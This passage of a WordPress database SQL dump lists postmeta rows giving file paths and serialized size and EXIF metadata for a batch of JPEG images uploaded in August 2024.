:27:\"S__69214219_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21656;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2672,971,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214218_0-1.jpg\";s:8:\"filesize\";i:522023;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214218_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16647;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214218_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140139;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214218_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8061;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214218_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85388;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214218_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:268848;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214218_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21524;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2673,972,'_wp_attached_file','2024/08/S__69214222_0-1.jpg'),
(2674,972,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214222_0-1.jpg\";s:8:\"filesize\";i:584069;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214222_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16928;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214222_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151826;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214222_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8301;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214222_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91002;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214222_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:296438;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214222_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21958;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2675,973,'_wp_attached_file','2024/08/S__69214220_0-1.jpg'),
(2676,973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214220_0-1.jpg\";s:8:\"filesize\";i:598354;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214220_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17196;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214220_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214220_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8503;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214220_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92896;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214220_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304250;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214220_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2677,974,'_wp_attached_file','2024/08/S__69214232_0-1.jpg'),
(2678,974,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214232_0-1.jpg\";s:8:\"filesize\";i:727204;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214232_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20141;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214232_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190286;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214232_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9559;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214232_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113039;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214232_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:371194;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214232_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26566;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2679,975,'_wp_attached_file','2024/08/S__69214231_0-1.jpg'),
(2680,975,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214231_0-1.jpg\";s:8:\"filesize\";i:727940;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214231_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20874;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214231_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192925;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214231_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9730;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214231_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115497;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214231_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:374794;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214231_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27636;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2681,976,'_wp_attached_file','2024/08/S__69214233_0-1.jpg'),
(2682,976,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214233_0-1.jpg\";s:8:\"filesize\";i:716625;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214233_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19740;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214233_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214233_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9429;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214233_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111850;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214233_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:366965;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214233_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26115;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2683,977,'_wp_attached_file','2024/08/S__69214234_0-1.jpg'),
(2684,977,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214234_0-1.jpg\";s:8:\"filesize\";i:716105;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214234_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20206;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214234_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187544;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214234_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9415;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214234_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111907;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214234_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:366605;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214234_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26545;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2685,978,'_wp_attached_file','2024/08/S__69214224_0-1.jpg'),
(2686,978,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214224_0-1.jpg\";s:8:\"filesize\";i:573024;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214224_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16964;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214224_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149791;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214224_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8500;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214224_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90229;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214224_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:291725;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214224_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2687,979,'_wp_attached_file','2024/08/S__69214226_0-1.jpg'),
(2688,979,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214226_0-1.jpg\";s:8:\"filesize\";i:604607;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214226_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17263;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214226_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157258;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214226_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8635;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214226_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94317;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214226_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:307721;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214226_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22559;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2689,980,'_wp_attached_file','2024/08/S__69214227_0-1.jpg'),
(2690,980,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214227_0-1.jpg\";s:8:\"filesize\";i:545156;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214227_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17101;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214227_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144578;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214227_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214227_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88118;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214227_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:279478;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214227_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22297;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2691,981,'_wp_attached_file','2024/08/S__69214228_0-1.jpg'),
(2692,981,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214228_0-1.jpg\";s:8:\"filesize\";i:633876;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214228_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20246;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214228_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173624;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214228_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9674;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214228_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214228_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:330514;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214228_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26481;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2693,982,'_wp_attached_file','2024/08/S__69214229_0-1.jpg'),
(2694,982,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214229_0-1.jpg\";s:8:\"filesize\";i:631961;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214229_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20293;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214229_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173574;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214229_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9864;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214229_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105816;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214229_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:330513;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214229_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26730;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2695,983,'_wp_attached_file','2024/08/S__69214230_0-1.jpg'),
(2696,983,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:27:\"2024/08/S__69214230_0-1.jpg\";s:8:\"filesize\";i:685997;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"S__69214230_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20605;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"S__69214230_0-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184278;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214230_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9644;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"S__69214230_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111235;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"S__69214230_0-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:355899;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:27:\"S__69214230_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s